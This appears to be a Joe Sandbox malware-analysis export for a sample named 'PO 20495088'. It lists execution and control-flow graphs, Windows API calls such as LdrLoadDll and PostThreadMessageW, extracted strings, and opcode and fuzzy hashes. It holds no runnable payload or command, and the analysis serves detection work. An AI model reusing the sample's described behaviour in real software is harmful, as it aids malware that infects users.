                                                                                                        execution_graph 90773 42bd43 90774 42bd60 90773->90774 90777 1762df0 LdrInitializeThunk 90774->90777 90775 42bd85 90777->90775 90778 424b63 90779 424b7f 90778->90779 90780 424ba7 90779->90780 90781 424bbb 90779->90781 90782 42c6f3 NtClose 90780->90782 90788 42c6f3 90781->90788 90785 424bb0 90782->90785 90784 424bc4 90791 42e853 RtlAllocateHeap 90784->90791 90787 424bcf 90789 42c70d 90788->90789 90790 42c71b NtClose 90789->90790 90790->90784 90791->90787 90858 42f7d3 90859 42f7e3 90858->90859 90860 42f7e9 90858->90860 90861 42e813 RtlAllocateHeap 90860->90861 90862 42f80f 90861->90862 90863 424ef3 90864 424f0c 90863->90864 90865 424f57 90864->90865 90868 424f9a 90864->90868 90870 424f9f 90864->90870 90866 42e733 RtlFreeHeap 90865->90866 90867 424f67 90866->90867 90869 42e733 RtlFreeHeap 90868->90869 90869->90870 90792 41e6e3 90793 41e709 90792->90793 90799 41e803 90793->90799 90801 42f903 90793->90801 90795 41e798 90797 41e7fa 90795->90797 90795->90799 90812 42bd93 90795->90812 90797->90799 90807 428b23 90797->90807 90800 41e8b8 90802 42f873 90801->90802 90804 42f8d0 90802->90804 90816 42e813 90802->90816 90804->90795 90805 42f8ad 90819 42e733 90805->90819 90808 428b88 90807->90808 90809 428bc3 90808->90809 90828 418e13 90808->90828 90809->90800 90811 428ba5 90811->90800 90813 42bdb0 90812->90813 90835 1762c0a 90813->90835 90814 42bdd9 90814->90797 90822 42ca03 90816->90822 90818 42e82b 90818->90805 90825 42ca53 90819->90825 90821 42e749 90821->90804 90823 42ca20 90822->90823 90824 42ca2e RtlAllocateHeap 90823->90824 90824->90818 90826 42ca6d 90825->90826 90827 42ca7b RtlFreeHeap 90826->90827 90827->90821 90829 418dec 90828->90829 90829->90828 90830 418dfb 90829->90830 90832 42ca93 90829->90832 90830->90811 90833 42cab0 90832->90833 90834 42cac1 ExitProcess 90833->90834 90834->90830 90836 1762c11 90835->90836 90837 1762c1f LdrInitializeThunk 90835->90837 
90836->90814 90837->90814 90838 4143a3 90839 4143bd 90838->90839 90844 417a63 90839->90844 90841 4143d8 90842 41441d 90841->90842 90843 41440c PostThreadMessageW 90841->90843 90843->90842 90845 417a87 90844->90845 90846 417ac3 LdrLoadDll 90845->90846 90847 417a8e 90845->90847 90846->90847 90847->90841 90871 41b513 90872 41b557 90871->90872 90873 41b578 90872->90873 90874 42c6f3 NtClose 90872->90874 90874->90873 90875 1762b60 LdrInitializeThunk 90848 413e89 90849 413e3b 90848->90849 90852 413e98 90848->90852 90853 42c973 90849->90853 90854 42c98d 90853->90854 90857 1762c70 LdrInitializeThunk 90854->90857 90855 413e65 90857->90855 90876 419018 90877 42c6f3 NtClose 90876->90877 90878 419022 90877->90878 90879 4019fb 90880 401a0b 90879->90880 90880->90879 90883 42fca3 90880->90883 90886 42e2f3 90883->90886 90887 42e319 90886->90887 90898 407403 90887->90898 90889 42e32f 90897 401b37 90889->90897 90901 41b323 90889->90901 90891 42e363 90912 428433 90891->90912 90892 42e34e 90892->90891 90893 42ca93 ExitProcess 90892->90893 90893->90891 90895 42e37d 90896 42ca93 ExitProcess 90895->90896 90896->90897 90916 416793 90898->90916 90900 407410 90900->90889 90902 41b34f 90901->90902 90927 41b213 90902->90927 90905 41b37c 90906 41b387 90905->90906 90909 42c6f3 NtClose 90905->90909 90906->90892 90907 41b3b0 90907->90892 90908 41b394 90908->90907 90910 42c6f3 NtClose 90908->90910 90909->90906 90911 41b3a6 90910->90911 90911->90892 90913 428495 90912->90913 90915 4284a2 90913->90915 90938 4188d3 90913->90938 90915->90895 90917 4167b0 90916->90917 90919 4167c3 90917->90919 90920 42d113 90917->90920 90919->90900 90922 42d12d 90920->90922 90921 42d15c 90921->90919 90922->90921 90923 42bd93 LdrInitializeThunk 90922->90923 90924 42d1b6 90923->90924 90925 42e733 RtlFreeHeap 90924->90925 90926 42d1cf 90925->90926 90926->90919 90928 41b22d 90927->90928 90932 41b309 90927->90932 90933 42be23 90928->90933 90931 42c6f3 NtClose 90931->90932 90932->90905 90932->90908 90934 42be3d 90933->90934 
90937 17635c0 LdrInitializeThunk 90934->90937 90935 41b2fd 90935->90931 90937->90935 90940 4188fd 90938->90940 90939 418dfb 90939->90915 90940->90939 90946 414023 90940->90946 90942 418a24 90942->90939 90943 42e733 RtlFreeHeap 90942->90943 90944 418a3c 90943->90944 90944->90939 90945 42ca93 ExitProcess 90944->90945 90945->90939 90950 414040 90946->90950 90948 41409c 90948->90942 90949 4140a6 90949->90942 90950->90949 90951 41b633 RtlFreeHeap LdrInitializeThunk 90950->90951 90951->90948

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 198 417a63-417a7f 199 417a87-417a8c 198->199 200 417a82 call 42f313 198->200 201 417a92-417aa0 call 42f913 199->201 202 417a8e-417a91 199->202 200->199 205 417ab0-417ac1 call 42ddc3 201->205 206 417aa2-417aad call 42fbb3 201->206 211 417ac3-417ad7 LdrLoadDll 205->211 212 417ada-417add 205->212 206->205 211->212
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 13db1cbfee882b855c2b2c2192e204c7396c591798c4373b0270ce1433d0553e
                                                                                                        • Instruction ID: b9c6e009b73b5ae58773c68f4c3761a1d2a249290bdbacd9d6936241b7e41e42
                                                                                                        • Opcode Fuzzy Hash: 13db1cbfee882b855c2b2c2192e204c7396c591798c4373b0270ce1433d0553e
                                                                                                        • Instruction Fuzzy Hash: 75015EB1E0020DABDF10DBE1DC42FDEB3789F14308F4081AAE90897241F634EB588B95

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 240 42c6f3-42c729 call 404803 call 42d8e3 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C724
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 991bd70cd18074ebea09832eaf9822568eb3c0bd9119a204aa57d0389f26078d
                                                                                                        • Instruction ID: 45f497414757547f8beb1b3252d1ee666934aacdfa14a46942fa06b2a35df88f
                                                                                                        • Opcode Fuzzy Hash: 991bd70cd18074ebea09832eaf9822568eb3c0bd9119a204aa57d0389f26078d
                                                                                                        • Instruction Fuzzy Hash: 7EE086766042147BC210FA9ADC01F97775CDFC5724F508419FA4C67241C679B901C7F4

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 254 1762b60-1762b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                        • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                        • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                        • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 256 1762df0-1762dfc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                        • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                        • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                        • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 255 1762c70-1762c7c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                        • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                        • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                        • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 257 17635c0-17635cc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                        • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                                        • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                        • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 0 41426f-414275 1 414277-414285 0->1 2 414298-41429a 0->2 3 414293-414295 1->3 4 414287-41428c 1->4 5 41429b-4142a0 2->5 3->2 4->5 6 41428e-414291 4->6 7 4142a2-4142aa 5->7 8 414307-41431e 5->8 6->3 9 414256-41426c 7->9 10 4142ac-4142ad 7->10 11 414320-414326 8->11 12 414346-414355 8->12 9->0 14 4142ba-4142cd 10->14 15 4142af-4142b6 10->15 16 414327 11->16 13 41435f-41436f 12->13 18 414371 13->18 19 4143af-41440a call 42e7d3 call 42f1e3 call 417a63 call 404773 call 425013 13->19 20 4142e6-414306 14->20 21 4142cf 14->21 15->14 16->16 17 41432a-414331 16->17 17->12 18->13 22 414373-414386 18->22 34 41442a-414430 19->34 35 41440c-41441b PostThreadMessageW 19->35 20->8 21->20 22->19 35->34 36 41441d-414427 35->36 36->34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 0-1546791543
                                                                                                        • Opcode ID: a8cb1c98fad871ba4acd92415a9dfdd6d89e2f2091ae0b8b045169520c2e8064
                                                                                                        • Instruction ID: 57812415c83f1eeb4dd1fb8259a154d59bcd12316cde13a9eea6d093cebd5724
                                                                                                        • Opcode Fuzzy Hash: a8cb1c98fad871ba4acd92415a9dfdd6d89e2f2091ae0b8b045169520c2e8064
                                                                                                        • Instruction Fuzzy Hash: 0641C071A05264AFCB11CBB4C881DDEBF79FE81354B98419AF8509B212D3389D42C799

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 37 4143a0-4143b5 38 4143bd-41440a call 42f1e3 call 417a63 call 404773 call 425013 37->38 39 4143b8 call 42e7d3 37->39 48 41442a-414430 38->48 49 41440c-41441b PostThreadMessageW 38->49 39->38 49->48 50 41441d-414427 49->50 50->48
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(4t-S77XJ,00000111,00000000,00000000), ref: 00414417
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 1836367815-1546791543
                                                                                                        • Opcode ID: 518d4c305dcae2d0c0bb87346cad55eb47b2201c0fb4b699344f5d0501c39987
                                                                                                        • Instruction ID: e01f956661fa296123b7277eae4f9d03119acb04e94a79e76889ee77046c0cce
                                                                                                        • Opcode Fuzzy Hash: 518d4c305dcae2d0c0bb87346cad55eb47b2201c0fb4b699344f5d0501c39987
                                                                                                        • Instruction Fuzzy Hash: 7101DBB1D0015C7ADB10AAE59C81DFF7B7CDF40798F408069FA04B7101D6385F068BA5

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 51 4143a3-4143b5 52 4143bd-41440a call 42f1e3 call 417a63 call 404773 call 425013 51->52 53 4143b8 call 42e7d3 51->53 62 41442a-414430 52->62 63 41440c-41441b PostThreadMessageW 52->63 53->52 63->62 64 41441d-414427 63->64 64->62
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(4t-S77XJ,00000111,00000000,00000000), ref: 00414417
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 4t-S77XJ$4t-S77XJ
                                                                                                        • API String ID: 1836367815-1546791543
                                                                                                        • Opcode ID: 9b67e17b73a2ec9a0027e42da5ce894fb8761611dd09888ebcd52560db28d713
                                                                                                        • Instruction ID: c2a567a50c204fdefcaadb66068f5d76db29b644af593a6b8d74a1e94a921b44
                                                                                                        • Opcode Fuzzy Hash: 9b67e17b73a2ec9a0027e42da5ce894fb8761611dd09888ebcd52560db28d713
                                                                                                        • Instruction Fuzzy Hash: BD01D6B2D0015C7ADB10AAE59C81DEFBB7CDF40798F40806AFA04B7201E6385F0687A5

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 213 417a56-417a58 214 417a5a-417a8c call 42f313 213->214 215 417abd-417ac1 213->215 220 417a92-417aa0 call 42f913 214->220 221 417a8e-417a91 214->221 217 417ac3-417ad7 LdrLoadDll 215->217 218 417ada-417add 215->218 217->218 224 417ab0-417ac1 call 42ddc3 220->224 225 417aa2-417aad call 42fbb3 220->225 224->217 224->218 225->224
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 00d74c54914e3674dfc88601c5f588642b460b76f1d93c50ac46ff01ae2bda70
                                                                                                        • Instruction ID: 94defb9d606960d9cf714c04d7a6df85f7efeeb467c247e03509e0413be65c8d
                                                                                                        • Opcode Fuzzy Hash: 00d74c54914e3674dfc88601c5f588642b460b76f1d93c50ac46ff01ae2bda70
                                                                                                        • Instruction Fuzzy Hash: A7F0C875E0420DABCF10CA90D881FEEB7B4EF54318F0042D6E94897191F234AB458755

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 235 42ca53-42ca91 call 404803 call 42d8e3 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,553FF0FC,00000007,00000000,00000004,00000000,0041734C,000000F4), ref: 0042CA8C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: b6bd7ca4e5e2f84388774a009f0dfe0e79a0f95eabc0b97f502082f69398ed41
                                                                                                        • Instruction ID: 7a9adfbdafc9d372e4b0d836e5a148591e2a6c627619a2347af921981898e166
                                                                                                        • Opcode Fuzzy Hash: b6bd7ca4e5e2f84388774a009f0dfe0e79a0f95eabc0b97f502082f69398ed41
                                                                                                        • Instruction Fuzzy Hash: D8E092B26042147BD610EF99DC41E9B33ACEFC9710F004419FA08A7242C674BD10CBB8

Control-flow Graph
control_flow_graph 230 42ca03-42ca44 call 404803 call 42d8e3 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041E798,?,?,00000000,?,0041E798,?,?,?), ref: 0042CA3F
Memory Dump Source
• Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 313aa5b546c07f93edee6525c96073c480a7a58352fffb5db240920bd29cf793
• Instruction ID: 148a3c592597cf3907103853008aa0ac8dc69ac322b15dd753513c58fffbeea1
• Opcode Fuzzy Hash: 313aa5b546c07f93edee6525c96073c480a7a58352fffb5db240920bd29cf793
• Instruction Fuzzy Hash: 91E06D766042047BC610EE99EC41F9B73ACEFC8710F00451AFD08A7281D770BD108AB4

Control-flow Graph
control_flow_graph 245 42ca93-42cacf call 404803 call 42d8e3 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,42C0B355,?,?,42C0B355), ref: 0042CACA
Memory Dump Source
• Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 534d7e229a5d92930b19e2663a0179a7f59ebedcd9ad57d7a5ff33ff6e21fe6c
• Instruction ID: 0820975280c14f995b631beb5a0ba1d08e772b4462a230f74f098af2566bdd33
• Opcode Fuzzy Hash: 534d7e229a5d92930b19e2663a0179a7f59ebedcd9ad57d7a5ff33ff6e21fe6c
• Instruction Fuzzy Hash: 03E02C326402107BC620FAAAEC01FEB736CCFC1314F40802AFA18A7242CA71B9018BF0

Control-flow Graph
control_flow_graph 250 1762c0a-1762c0f 251 1762c11-1762c18 250->251 252 1762c1f-1762c26 LdrInitializeThunk 250->252
APIs
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
• Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
• Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
• Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276
Strings
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
• Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
• Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
• Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
Strings
• double initialized or corrupted critical section, xrefs: 01795508
• Critical section address, xrefs: 01795425, 017954BC, 01795534
• Thread identifier, xrefs: 0179553A
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
• 8, xrefs: 017952E3
• Invalid debug info address of this critical section, xrefs: 017954B6
• corrupted critical section, xrefs: 017954C2
• Thread is in a state in which it cannot own a critical section, xrefs: 01795543
• Critical section address., xrefs: 01795502
• Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
• undeleted critical section in freed memory, xrefs: 0179542B
• Critical section debug info address, xrefs: 0179541F, 0179552E
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
• Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
• Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
• Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
Strings
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
• @, xrefs: 0179259B
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
• RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
• Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
• Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
• Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
• Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
Strings
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
• Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
• Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
• Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
• Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
Strings
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
• Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
• Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
• Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
• Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
Strings
